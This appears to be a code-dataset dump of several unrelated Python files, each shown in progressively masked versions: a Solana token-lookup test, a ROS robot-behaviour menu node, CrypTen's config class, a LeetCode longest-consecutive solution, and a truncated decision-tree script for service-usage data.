{ "blob_id": "5e7a589af69a604021ed9558fcce721a8e254fee", "index": 5269, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_token_lookups_with_full_data():\n token_lookup = mango.SplTokenLookup.load(mango.SplTokenLookup.\n DefaultDataFilepath)\n assert token_lookup.find_by_symbol('BTC').mint == PublicKey(\n '9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E')\n assert token_lookup.find_by_symbol('ETH').mint == PublicKey(\n '2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk')\n assert token_lookup.find_by_mint(\n 'AKJHspCwDhABucCxNLXUSfEzb7Ny62RqFtC9uNjJi4fq').symbol == 'SRM-SOL'\n assert token_lookup.find_by_mint(\n 'Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB').symbol == 'USDT'\n", "step-3": "<mask token>\n\n\ndef test_token_lookup():\n data = {'tokens': [{'address':\n 'So11111111111111111111111111111111111111112', 'symbol': 'SOL',\n 'name': 'Wrapped SOL', 'decimals': 9}, {'address':\n 'EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v', 'symbol': 'USDC',\n 'name': 'USD Coin', 'decimals': 6}, {'address':\n '9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E', 'symbol': 'BTC',\n 'name': 'Wrapped Bitcoin (Sollet)', 'decimals': 6}, {'address':\n '2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk', 'symbol': 'ETH',\n 'name': 'Wrapped Ethereum (Sollet)', 'decimals': 6}]}\n actual = mango.SplTokenLookup('test-filename', data)\n assert actual is not None\n assert actual.logger is not None\n assert actual.find_by_symbol('ETH') is not None\n assert actual.find_by_symbol('ETH').name == 'Wrapped Ethereum (Sollet)'\n assert actual.find_by_symbol('BTC') is not None\n assert actual.find_by_symbol('BTC').name == 'Wrapped Bitcoin (Sollet)'\n\n\ndef test_token_lookups_with_full_data():\n token_lookup = mango.SplTokenLookup.load(mango.SplTokenLookup.\n DefaultDataFilepath)\n assert token_lookup.find_by_symbol('BTC').mint == PublicKey(\n '9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E')\n assert token_lookup.find_by_symbol('ETH').mint == PublicKey(\n '2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk')\n assert token_lookup.find_by_mint(\n 'AKJHspCwDhABucCxNLXUSfEzb7Ny62RqFtC9uNjJi4fq').symbol == 'SRM-SOL'\n assert token_lookup.find_by_mint(\n 'Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB').symbol == 'USDT'\n", "step-4": "from .context import mango\nfrom solana.publickey import PublicKey\n\n\ndef test_token_lookup():\n data = {'tokens': [{'address':\n 'So11111111111111111111111111111111111111112', 'symbol': 'SOL',\n 'name': 'Wrapped SOL', 'decimals': 9}, {'address':\n 'EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v', 'symbol': 'USDC',\n 'name': 'USD Coin', 'decimals': 6}, {'address':\n '9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E', 'symbol': 'BTC',\n 'name': 'Wrapped Bitcoin (Sollet)', 'decimals': 6}, {'address':\n '2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk', 'symbol': 'ETH',\n 'name': 'Wrapped Ethereum (Sollet)', 'decimals': 6}]}\n actual = mango.SplTokenLookup('test-filename', data)\n assert actual is not None\n assert actual.logger is not None\n assert actual.find_by_symbol('ETH') is not None\n assert actual.find_by_symbol('ETH').name == 'Wrapped Ethereum (Sollet)'\n assert actual.find_by_symbol('BTC') is not None\n assert actual.find_by_symbol('BTC').name == 'Wrapped Bitcoin (Sollet)'\n\n\ndef test_token_lookups_with_full_data():\n token_lookup = mango.SplTokenLookup.load(mango.SplTokenLookup.\n DefaultDataFilepath)\n assert token_lookup.find_by_symbol('BTC').mint == PublicKey(\n '9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E')\n assert token_lookup.find_by_symbol('ETH').mint == PublicKey(\n '2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk')\n assert token_lookup.find_by_mint(\n 'AKJHspCwDhABucCxNLXUSfEzb7Ny62RqFtC9uNjJi4fq').symbol == 'SRM-SOL'\n assert token_lookup.find_by_mint(\n 'Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB').symbol == 'USDT'\n", "step-5": "from .context import mango\n\nfrom solana.publickey import PublicKey\n\n\ndef test_token_lookup():\n data = {\n \"tokens\": [\n {\n \"address\": \"So11111111111111111111111111111111111111112\",\n \"symbol\": \"SOL\",\n \"name\": \"Wrapped SOL\",\n \"decimals\": 9,\n },\n {\n \"address\": \"EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v\",\n \"symbol\": \"USDC\",\n \"name\": \"USD Coin\",\n \"decimals\": 6,\n },\n {\n \"address\": \"9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E\",\n \"symbol\": \"BTC\",\n \"name\": \"Wrapped Bitcoin (Sollet)\",\n \"decimals\": 6,\n },\n {\n \"address\": \"2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk\",\n \"symbol\": \"ETH\",\n \"name\": \"Wrapped Ethereum (Sollet)\",\n \"decimals\": 6,\n }]\n }\n actual = mango.SplTokenLookup(\"test-filename\", data)\n assert actual is not None\n assert actual.logger is not None\n assert actual.find_by_symbol(\"ETH\") is not None\n assert actual.find_by_symbol(\"ETH\").name == \"Wrapped Ethereum (Sollet)\"\n assert actual.find_by_symbol(\"BTC\") is not None\n assert actual.find_by_symbol(\"BTC\").name == \"Wrapped Bitcoin (Sollet)\"\n\n\ndef test_token_lookups_with_full_data():\n token_lookup = mango.SplTokenLookup.load(mango.SplTokenLookup.DefaultDataFilepath)\n assert token_lookup.find_by_symbol(\"BTC\").mint == PublicKey(\"9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E\")\n assert token_lookup.find_by_symbol(\"ETH\").mint == PublicKey(\"2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk\")\n assert token_lookup.find_by_mint(\"AKJHspCwDhABucCxNLXUSfEzb7Ny62RqFtC9uNjJi4fq\").symbol == \"SRM-SOL\"\n assert token_lookup.find_by_mint(\"Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB\").symbol == \"USDT\"\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#! /usr/bin/env python # import ros stuff import rospy from std_srvs.srv import * #to check if the service is active active_ = False def unable_service(req): """ This function contains the variable declared above that is used to enable the service. """ global active_ active_ = req.data res = SetBoolResponse() res.success = True res.message = 'Done!' return res def getInput(): """ This function get the input, given by the user, on which of the 5 behaviors proposed, the robot must follow. If one of the input chosen by the user is already active, the function doesn't ask to give again the input. """ global active_ #to disable the service active_ = False # reading the previous input prev_input_ = rospy.get_param('/input') input_ = prev_input_ #in order to make the user to choose one of the 5 possible inputs while (prev_input_ == input_) or (input_ > 5 or input_ < 1): if input_ > 5 or input_ < 1: #in the case in which the user make another selection print "Unknown input, please try again" #propose to the user which are the real possibilities print("Please select one of the following senteces\n") print("1 - Move the robot randomly in the environment, by choosing one of six possible target positions\n") print("2 - The user can chose the next target position\n") print("3 - Start following the external walls\n") print("4 - Stop the robot in the last position\n") print("5 - Change the planning algorithm from move_base to bug0 and vice versa\n") #read the input typed by the user input_ = (int(raw_input("Please select a number between 1 and 5: "))) #set the choice made by the user if input_ >= 1 and input_ <= 5: rospy.set_param('/input', input_) def main(): """ The main function allows the user to choose the robot's behavior. If the service is active it call the function getInput that allows the user to make a new choice. If it is not, it check if the selected behavior is the second one and in that case change it with the fourth one. """ global active_ #init user_interface rospy.init_node('user_interface') #service that allows the user to choose a new input srv_user_interface = rospy.Service('/user_interface_service', SetBool, unable_service) rate = rospy.Rate(1) while not rospy.is_shutdown(): #if the service is not active if not active_: rate.sleep() #if the selected behavior is the second one if rospy.get_param("/input") == 2: #change it in the fourth behavior rospy.set_param("/input",4) continue #if the service is active else: getInput() # allow the user to choose a new behaviour rate.sleep() if __name__ == '__main__': try: main() except rospy.ROSInterruptException: pass
normal
{ "blob_id": "0f6737b9e9e9a13d75c20352e9ef9c1db6c0c8a3", "index": 828, "step-1": "#! /usr/bin/env python\n\n# import ros stuff\nimport rospy\nfrom std_srvs.srv import *\n\n#to check if the service is active\nactive_ = False\n\ndef unable_service(req):\n\t\"\"\"\n\tThis function contains the variable declared above that is\n\tused to enable the service.\n\t\"\"\"\n\tglobal active_\n \n\tactive_ = req.data\n\tres = SetBoolResponse()\n\tres.success = True\n\tres.message = 'Done!'\n\n\treturn res\n\t\ndef getInput():\n\t\"\"\"\n\tThis function get the input, given by the user, on which of the 5\n\tbehaviors proposed, the robot must follow.\n\tIf one of the input chosen by the user is already active, the \n\tfunction doesn't ask to give again the input.\n\t\"\"\"\t\n\tglobal active_\n\n\t#to disable the service \n\tactive_ = False \n\t\n\t# reading the previous input\n\tprev_input_ = rospy.get_param('/input')\n\tinput_ = prev_input_\n\t\n\t#in order to make the user to choose one of the 5 possible inputs\n\twhile (prev_input_ == input_) or (input_ > 5 or input_ < 1):\n\t\tif input_ > 5 or input_ < 1: \n\t\t\t#in the case in which the user make another selection\n\t\t\tprint \"Unknown input, please try again\" \n\t\t\n\t\t#propose to the user which are the real possibilities\n\t\tprint(\"Please select one of the following senteces\\n\")\n\t\tprint(\"1 - Move the robot randomly in the environment, by choosing one of six possible target positions\\n\")\n\t\tprint(\"2 - The user can chose the next target position\\n\")\n\t\tprint(\"3 - Start following the external walls\\n\")\n\t\tprint(\"4 - Stop the robot in the last position\\n\")\n\t\tprint(\"5 - Change the planning algorithm from move_base to bug0 and vice versa\\n\")\n\n\t\t#read the input typed by the user\t\n\t\tinput_ = (int(raw_input(\"Please select a number between 1 and 5: \")))\n\n\t#set the choice made by the user\n\tif input_ >= 1 and input_ <= 5:\n\t\trospy.set_param('/input', input_)\n\ndef main():\n\t\"\"\"\t\n\tThe main function allows the user to choose the robot's behavior.\n\tIf the service is active it call the function getInput that allows\n\tthe user to make a new choice. If it is not, it check if the selected\n\tbehavior is the second one and in that case change it with the fourth one.\n\t\"\"\"\n\tglobal active_\n\t\n\t#init user_interface\n\trospy.init_node('user_interface')\n\n\t#service that allows the user to choose a new input\n\tsrv_user_interface = rospy.Service('/user_interface_service', SetBool, unable_service)\n\t\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown():\n\t\t#if the service is not active\n\t\tif not active_: \n\t\t\trate.sleep()\n\t\t\t\n\t\t\t#if the selected behavior is the second one\n\t\t\tif rospy.get_param(\"/input\") == 2:\n\t\t\t\t#change it in the fourth behavior\n\t\t\t\trospy.set_param(\"/input\",4) \n\t\t\t\n\t\t\tcontinue\n\t\t\n\t\t#if the service is active\t\n\t\telse: \n\t\t\tgetInput() # allow the user to choose a new behaviour\n\t\t\n\t\trate.sleep()\n\t\t\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import os from contextlib import contextmanager import yaml from omegaconf import OmegaConf class CrypTenConfig: """ Configuration object used to store configurable parameters for CrypTen. This object acts as a nested dictionary, but can be queried using dot-notation( e.g. querying or setting `cfg.a.b` is equivalent to `cfg['a']['b']`). Users can load a CrypTen config from a file using `cfg.load_config(filepath)`. Users can temporarily override a config parameter using the contextmanager temp_override: .. code-block:: python cfg.a.b = outer # sets cfg["a"]["b"] to outer value with cfg.temp_override("a.b", inner): print(cfg.a.b) # prints inner value print(cfg.a.b) # prints outer value """ __DEFAULT_CONFIG_PATH = os.path.normpath( os.path.join(__file__, "../../../configs/default.yaml") ) def __init__(self, config_file=None): self.load_config(config_file) def load_config(self, config_file): """Loads config from a yaml file""" if config_file is None: config_file = CrypTenConfig.__DEFAULT_CONFIG_PATH # Use yaml to open stream for safe load with open(config_file) as stream: config_dict = yaml.safe_load(stream) self.config = OmegaConf.create(config_dict) def set_config(self, config): if isinstance(config, CrypTenConfig): self.config = config.config else: self.config = config def __getattribute__(self, name): try: return object.__getattribute__(self, name) except AttributeError: keys = name.split(".") result = getattr(self.config, keys[0]) for key in keys[1:]: result = getattr(result, key) return result def __getitem__(self, name): return self.__getattribute__(name) def __setattr__(self, name, value): if name == "config": object.__setattr__(self, name, value) try: # Can only set attribute if already exists object.__getattribute__(self, name) object.__setattr__(self, name, value) except AttributeError: dotlist = [f"{name}={value}"] update = OmegaConf.from_dotlist(dotlist) self.config = OmegaConf.merge(self.config, update) def __setitem__(self, name, value): self.__setattr__(name, value) @contextmanager def temp_override(self, override_dict): old_config = self.config try: dotlist = [f"{k}={v}" for k, v in override_dict.items()] update = OmegaConf.from_dotlist(dotlist) self.config = OmegaConf.merge(self.config, update) yield finally: self.config = old_config
normal
{ "blob_id": "501ca508df5d72b0190b933f07c4bd505d7090c0", "index": 6464, "step-1": "<mask token>\n\n\nclass CrypTenConfig:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @contextmanager\n def temp_override(self, override_dict):\n old_config = self.config\n try:\n dotlist = [f'{k}={v}' for k, v in override_dict.items()]\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n yield\n finally:\n self.config = old_config\n", "step-2": "<mask token>\n\n\nclass CrypTenConfig:\n <mask token>\n <mask token>\n\n def __init__(self, config_file=None):\n self.load_config(config_file)\n <mask token>\n\n def set_config(self, config):\n if isinstance(config, CrypTenConfig):\n self.config = config.config\n else:\n self.config = config\n\n def __getattribute__(self, name):\n try:\n return object.__getattribute__(self, name)\n except AttributeError:\n keys = name.split('.')\n result = getattr(self.config, keys[0])\n for key in keys[1:]:\n result = getattr(result, key)\n return result\n\n def __getitem__(self, name):\n return self.__getattribute__(name)\n <mask token>\n\n def __setitem__(self, name, value):\n self.__setattr__(name, value)\n\n @contextmanager\n def temp_override(self, override_dict):\n old_config = self.config\n try:\n dotlist = [f'{k}={v}' for k, v in override_dict.items()]\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n yield\n finally:\n self.config = old_config\n", "step-3": "<mask token>\n\n\nclass CrypTenConfig:\n <mask token>\n __DEFAULT_CONFIG_PATH = os.path.normpath(os.path.join(__file__,\n '../../../configs/default.yaml'))\n\n def __init__(self, config_file=None):\n self.load_config(config_file)\n\n def load_config(self, config_file):\n \"\"\"Loads config from a yaml file\"\"\"\n if config_file is None:\n config_file = CrypTenConfig.__DEFAULT_CONFIG_PATH\n with open(config_file) as stream:\n config_dict = yaml.safe_load(stream)\n self.config = OmegaConf.create(config_dict)\n\n def set_config(self, config):\n if isinstance(config, CrypTenConfig):\n self.config = config.config\n else:\n self.config = config\n\n def __getattribute__(self, name):\n try:\n return object.__getattribute__(self, name)\n except AttributeError:\n keys = name.split('.')\n result = getattr(self.config, keys[0])\n for key in keys[1:]:\n result = getattr(result, key)\n return result\n\n def __getitem__(self, name):\n return self.__getattribute__(name)\n\n def __setattr__(self, name, value):\n if name == 'config':\n object.__setattr__(self, name, value)\n try:\n object.__getattribute__(self, name)\n object.__setattr__(self, name, value)\n except AttributeError:\n dotlist = [f'{name}={value}']\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n\n def __setitem__(self, name, value):\n self.__setattr__(name, value)\n\n @contextmanager\n def temp_override(self, override_dict):\n old_config = self.config\n try:\n dotlist = [f'{k}={v}' for k, v in override_dict.items()]\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n yield\n finally:\n self.config = old_config\n", "step-4": "import os\nfrom contextlib import contextmanager\nimport yaml\nfrom omegaconf import OmegaConf\n\n\nclass CrypTenConfig:\n \"\"\"\n Configuration object used to store configurable parameters for CrypTen.\n\n This object acts as a nested dictionary, but can be queried using dot-notation(\n e.g. querying or setting `cfg.a.b` is equivalent to `cfg['a']['b']`).\n\n Users can load a CrypTen config from a file using `cfg.load_config(filepath)`.\n\n Users can temporarily override a config parameter using the contextmanager temp_override:\n\n .. code-block:: python\n\n cfg.a.b = outer # sets cfg[\"a\"][\"b\"] to outer value\n\n with cfg.temp_override(\"a.b\", inner):\n print(cfg.a.b) # prints inner value\n\n print(cfg.a.b) # prints outer value\n \"\"\"\n __DEFAULT_CONFIG_PATH = os.path.normpath(os.path.join(__file__,\n '../../../configs/default.yaml'))\n\n def __init__(self, config_file=None):\n self.load_config(config_file)\n\n def load_config(self, config_file):\n \"\"\"Loads config from a yaml file\"\"\"\n if config_file is None:\n config_file = CrypTenConfig.__DEFAULT_CONFIG_PATH\n with open(config_file) as stream:\n config_dict = yaml.safe_load(stream)\n self.config = OmegaConf.create(config_dict)\n\n def set_config(self, config):\n if isinstance(config, CrypTenConfig):\n self.config = config.config\n else:\n self.config = config\n\n def __getattribute__(self, name):\n try:\n return object.__getattribute__(self, name)\n except AttributeError:\n keys = name.split('.')\n result = getattr(self.config, keys[0])\n for key in keys[1:]:\n result = getattr(result, key)\n return result\n\n def __getitem__(self, name):\n return self.__getattribute__(name)\n\n def __setattr__(self, name, value):\n if name == 'config':\n object.__setattr__(self, name, value)\n try:\n object.__getattribute__(self, name)\n object.__setattr__(self, name, value)\n except AttributeError:\n dotlist = [f'{name}={value}']\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n\n def __setitem__(self, name, value):\n self.__setattr__(name, value)\n\n @contextmanager\n def temp_override(self, override_dict):\n old_config = self.config\n try:\n dotlist = [f'{k}={v}' for k, v in override_dict.items()]\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n yield\n finally:\n self.config = old_config\n", "step-5": "#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport os\nfrom contextlib import contextmanager\n\nimport yaml\nfrom omegaconf import OmegaConf\n\n\nclass CrypTenConfig:\n \"\"\"\n Configuration object used to store configurable parameters for CrypTen.\n\n This object acts as a nested dictionary, but can be queried using dot-notation(\n e.g. querying or setting `cfg.a.b` is equivalent to `cfg['a']['b']`).\n\n Users can load a CrypTen config from a file using `cfg.load_config(filepath)`.\n\n Users can temporarily override a config parameter using the contextmanager temp_override:\n\n .. code-block:: python\n\n cfg.a.b = outer # sets cfg[\"a\"][\"b\"] to outer value\n\n with cfg.temp_override(\"a.b\", inner):\n print(cfg.a.b) # prints inner value\n\n print(cfg.a.b) # prints outer value\n \"\"\"\n\n __DEFAULT_CONFIG_PATH = os.path.normpath(\n os.path.join(__file__, \"../../../configs/default.yaml\")\n )\n\n def __init__(self, config_file=None):\n self.load_config(config_file)\n\n def load_config(self, config_file):\n \"\"\"Loads config from a yaml file\"\"\"\n if config_file is None:\n config_file = CrypTenConfig.__DEFAULT_CONFIG_PATH\n\n # Use yaml to open stream for safe load\n with open(config_file) as stream:\n config_dict = yaml.safe_load(stream)\n self.config = OmegaConf.create(config_dict)\n\n def set_config(self, config):\n if isinstance(config, CrypTenConfig):\n self.config = config.config\n else:\n self.config = config\n\n def __getattribute__(self, name):\n try:\n return object.__getattribute__(self, name)\n except AttributeError:\n keys = name.split(\".\")\n result = getattr(self.config, keys[0])\n for key in keys[1:]:\n result = getattr(result, key)\n return result\n\n def __getitem__(self, name):\n return self.__getattribute__(name)\n\n def __setattr__(self, name, value):\n if name == \"config\":\n object.__setattr__(self, name, value)\n try:\n # Can only set attribute if already exists\n object.__getattribute__(self, name)\n object.__setattr__(self, name, value)\n except AttributeError:\n dotlist = [f\"{name}={value}\"]\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n\n def __setitem__(self, name, value):\n self.__setattr__(name, value)\n\n @contextmanager\n def temp_override(self, override_dict):\n old_config = self.config\n try:\n dotlist = [f\"{k}={v}\" for k, v in override_dict.items()]\n update = OmegaConf.from_dotlist(dotlist)\n self.config = OmegaConf.merge(self.config, update)\n yield\n finally:\n self.config = old_config\n", "step-ids": [ 2, 7, 10, 12, 13 ] }
[ 2, 7, 10, 12, 13 ]
""" 100 4 200 1 3 2 100 4 200 1 3 2 6:35 """ class Solution: def longestConsecutive(self, nums: List[int]) -> int: numset = set(nums) ans = 0 # visited = set(nums) maxnum = float('-inf') if not nums: return 0 for n in numset: # saven = n if n+1 not in numset: ans = 1 saven = n while saven-1 in numset: ans +=1 saven = saven-1 # visited.add(n) maxnum = max(ans, maxnum) return maxnum # cnt = Counter(nums) # print(cnt) # maxnum = float('-inf') # minnum = float('inf') # ans = [minnum, maxnum] # visited = set() # def checknumber(checknum, cnt, ans): # minnum = ans[0] # maxnum = ans[1] # print('checknum', checknum, minnum, maxnum, visited) # if checknum in cnt and n not in visited: # minnum = min(checknum, minnum) # maxnum = max(checknum, maxnum) # visited.add(n) # if checknum-1 in cnt: # checknumber(checknum-1, cnt,[minnum, maxnum]) # if checknum+1 in cnt: # checknumber(checknum+1, cnt, [minnum, maxnum]) # for n in nums: # checknumber(n, cnt, [minnum, maxnum]) # return (ans[1]-ans[0])+1
normal
{ "blob_id": "50c7ce95f17cbd40a753d16d9f9fab349ad4f4ce", "index": 3801, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Solution:\n\n def longestConsecutive(self, nums: List[int]) ->int:\n numset = set(nums)\n ans = 0\n maxnum = float('-inf')\n if not nums:\n return 0\n for n in numset:\n if n + 1 not in numset:\n ans = 1\n saven = n\n while saven - 1 in numset:\n ans += 1\n saven = saven - 1\n maxnum = max(ans, maxnum)\n return maxnum\n", "step-4": "\"\"\"\n 100 4 200 1 3 2\n100 \n4\n200\n1\n3\n2\n\n6:35\n\"\"\"\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n numset = set(nums)\n ans = 0\n # visited = set(nums)\n maxnum = float('-inf')\n \n if not nums: \n return 0\n \n for n in numset:\n # saven = n\n \n if n+1 not in numset:\n ans = 1\n saven = n\n\n while saven-1 in numset:\n ans +=1\n saven = saven-1\n # visited.add(n)\n\n maxnum = max(ans, maxnum)\n \n return maxnum\n \n \n \n \n \n # cnt = Counter(nums)\n# print(cnt)\n# maxnum = float('-inf')\n# minnum = float('inf')\n# ans = [minnum, maxnum]\n# visited = set()\n \n# def checknumber(checknum, cnt, ans):\n# minnum = ans[0]\n# maxnum = ans[1]\n# print('checknum', checknum, minnum, maxnum, visited)\n# if checknum in cnt and n not in visited:\n# minnum = min(checknum, minnum) \n# maxnum = max(checknum, maxnum)\n# visited.add(n)\n\n# if checknum-1 in cnt:\n# checknumber(checknum-1, cnt,[minnum, maxnum])\n# if checknum+1 in cnt:\n# checknumber(checknum+1, cnt, [minnum, maxnum])\n \n# for n in nums:\n# checknumber(n, cnt, [minnum, maxnum])\n \n# return (ans[1]-ans[0])+1", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!usr/bin/env python #-*- coding:utf-8 -*- # this model is for decision tree # objective: To cluster different service # JialongLi 2017/03/18 import re import os import sys import pickle import copy import random import pydotplus USER_NUM = 1000 reload(sys) sys.setdefaultencoding( "utf-8" ) from sklearn import tree from sklearn.neural_network import MLPClassifier from sklearn.preprocessing import StandardScaler from sklearn.ensemble import RandomForestClassifier from sklearn.cluster import KMeans # 0 represent Sunday, 1: Monday, 6: Saturday, 0: Sunday day_index = {'0507': 1, '0508': 2, '0509': 3, '0510': 4, '0511': 5, '0512': 6, '0513': 0, '0604': 1, '0605': 2, '0606': 3, '0607': 4, '0608': 5, '0609': 6, '0610': 0, '0702': 1, '0703': 2, '0704': 3, '0705': 4, '0706': 5, '0707': 6, '0708': 0, '0806': 1, '0807': 2, '0808': 3, '0809': 4, '0810': 5, '0811': 6, '0812': 0} service_type = ['I', 'F', 'W', 'G', 'S', 'V'] # get activity_dict # user's activity: default value is 'F' # format: {id_1:{'0507': [24/PERIOD], '0508': ['I', 'W', 'G']}, id_2} def get_activity_dict(activity_dict_path): pkl_file = open(activity_dict_path, 'rb') activity_dict = pickle.load(pkl_file) pkl_file.close() return activity_dict # data are divided into train data and test data # first three weeks: train data; last week: test data # train_dict and test_dict are subset of activity_dict, id format is different # activity_dict format: {real id_1:{'0507': [24/PERIOD], '0508': ['I', 'W', 'G']}, id_2} # user_id_index: key = number, value = real id def data_segement(activity_dict, train_dict_path, test_dict_path, user_id_index_path): train_dict = {} test_dict = {} user_count = 0 user_id_index = {} for key_0, value_0 in activity_dict.items(): # key_0: real user_id train_dict[user_count] = {} test_dict[user_count] = {} user_id_index[user_count] = key_0 for key, value in value_0.items(): if key[1] == '8': # data of August, test set test_dict[user_count][key] = value else: train_dict[user_count][key] = value # train set user_count += 1 output_1 = open(train_dict_path, 'wb') pickle.dump(train_dict, output_1) output_2 = open(test_dict_path, 'wb') pickle.dump(test_dict, output_2) output_3 = open(user_id_index_path, 'wb') pickle.dump(user_id_index, output_3) output_1.close() output_2.close() output_3.close() # get train data and test data # train_dict, test_dict format: {number id_1:{'0507': [24/PERIOD], '0508': ['I', 'W', 'G']}, id_2} def get_data(train_dict_path, test_dict_path, user_id_index_path): pkl_file_1 = open(train_dict_path, 'rb') pkl_file_2 = open(test_dict_path, 'rb') pkl_file_3 = open(user_id_index_path, 'rb') train_dict = pickle.load(pkl_file_1) test_dict = pickle.load(pkl_file_2) user_id_index = pickle.load(pkl_file_3) pkl_file_1.close() pkl_file_2.close() pkl_file_3.close() return train_dict, test_dict, user_id_index # get profile def get_profile(profile_path): pkl_file = open(profile_path, 'rb') profile = pickle.load(pkl_file) return profile # select different features # feature format: [user_id, gender, age, edu, job, hour, date], 7 features # profile: dict, {real user_id: [gender, age, edu, job]} # feature format: double list, outer list element is a sample: [number user_id, gender, age, edu, job, hour, date] # category format: list, element is service type, length = feature def feature_select(data_dict, profile, user_id_index, is_over_sampling): feature = [] category = [] over_sampling_num = 0 for user_id, all_dates in data_dict.items(): real_user_id = user_id_index[user_id] one_user_profile = copy.deepcopy(profile[real_user_id]) # gender, age, edu, job one_user_profile.insert(0, user_id) # insert user_id for date, activity in all_dates.items(): for i in range(len(activity)): if 1: #activity[i] != 'F': # do not add 'F' sample = copy.deepcopy(one_user_profile) #del(sample[1:4]) sample.append(i) #(int(i/6)) # i represents hour sample.append(day_index[date]) # day_index: 7 days in one week feature.append(sample) #category.append(activity[i]) if activity[i] == 'F': category.append('F') else: category.append('O') if is_over_sampling and len(sample) > 5: # make sure that features are completed if activity[i] != 'F': sample_over = [[] for k in range(over_sampling_num)] for j in range(over_sampling_num): sample_over[j] = copy.deepcopy(sample) sample_over[j][-3] = random.randint(0, 8) # random disturbance in job feature feature.append(sample_over[j]) category.append('O') return feature, category # build features, all features # False means test data do not need over sampling def feature_build(train_dict, test_dict, profile, user_id_index): feature_train, category_train = feature_select(train_dict, profile, user_id_index, True) feature_test, category_test = feature_select(test_dict, profile, user_id_index, False) return feature_train, feature_test, category_train, category_test # calculating the hit rate def cal_hit_rate(category_predict, category_test): hit_count = 0 sample_test_count = len(category_predict) for i in range(sample_test_count): if category_predict[i] == category_test[i]: hit_count += 1 hit_rate = float(hit_count) / float(sample_test_count) print 'hit rate: ' + str(round(hit_rate, 4) * 100) + '%' # calculating F value def calculating_F_value(category_predict, category_test): n_predict = 0 n_origin = 0 hit_count = 0 for item in category_predict: if item != 'F': n_predict += 1 for item in category_test: if item != 'F': n_origin += 1 for i in range(len(category_predict)): if category_predict[i] != 'F' and category_predict[i] == category_test[i]: hit_count += 1 precision = float(hit_count) / float(n_predict) recall = float(hit_count) / float(n_origin) F_value = 2 * precision * recall / (precision + recall) print 'n_predict: ' + str(n_predict) print 'n_origin: ' + str(n_origin) print 'precision: ' + str(round(precision, 3)) print 'recall: ' + str(round(recall, 3)) print 'F_value: ' + str(round(F_value, 3)) # 1. select the service type using most in that period in past days # 2. if user did not use service in that period before, select the service type using most in past days # 3. if user did not use service before, select service randomly # service_count_hour: key = (user_id, hour, service_type) value = count # service_count_past: key = (user_id, service_type) value = count # service_hour: key = (user_id, hour), value = [service_type, count] # service_past: key = user_id, value = [service_type, count] def conventional_method_Mused(feature_train, feature_test, category_train): if len(feature_train[0]) != 7: print 'feature wrong' service_count_hour = {} service_count_past = {} for i in range(len(feature_train)): key_hour = (feature_train[i][0], feature_train[i][5], category_train[i]) if key_hour not in service_count_hour: service_count_hour[key_hour] = 1 else: service_count_hour[key_hour] += 1 key_past = (feature_train[i][0], category_train[i]) if key_past not in service_count_past: service_count_past[key_past] = 1 else: service_count_past[key_past] += 1 service_hour = {} service_past = {} for key, value in service_count_hour.items(): key_hour = (key[0], key[1]) if key_hour not in service_hour: service_hour[key_hour] = [key[2], value] else: if value > service_hour[key_hour][1]: service_hour[key_hour] = [key[2], value] else: pass for key, value in service_count_past.items(): key_past = key[0] if key_past not in service_past: service_past[key_past] = [key[1], value] else: if value > service_past[key_past][1]: service_past[key_past] = [key[1], value] else: pass category_predict = [] for i in range(len(feature_test)): key_0 = 